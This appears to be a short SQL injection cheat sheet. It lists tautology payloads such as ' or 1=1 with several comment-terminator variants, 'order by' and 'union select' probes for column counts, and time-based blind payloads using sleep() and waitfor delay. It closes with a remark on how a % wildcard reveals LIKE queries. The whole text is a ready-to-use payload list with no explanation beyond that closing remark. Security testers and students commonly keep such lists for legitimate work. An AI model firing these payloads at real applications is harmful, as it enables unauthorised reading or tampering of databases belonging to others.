' or 1=1
' or 1=1-- -
' or 1=1#
' or 1=1/
' or 1=1-- - //
' order by 1 -- -
' order by 1-- #
' or sleep(5)-- -
" or sleep(5)="
' or sleep(5)='
'waitfor delay '0:0:5'--
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
' AND IF (1=1, sleep(3),'false') -- //
union select <number of columns>
AND can be used to replace OR as well
%
If an application accepts a % as a wildcard the query most likely is putting
%'s inbetween the input (%joe%) to find something "like" the input
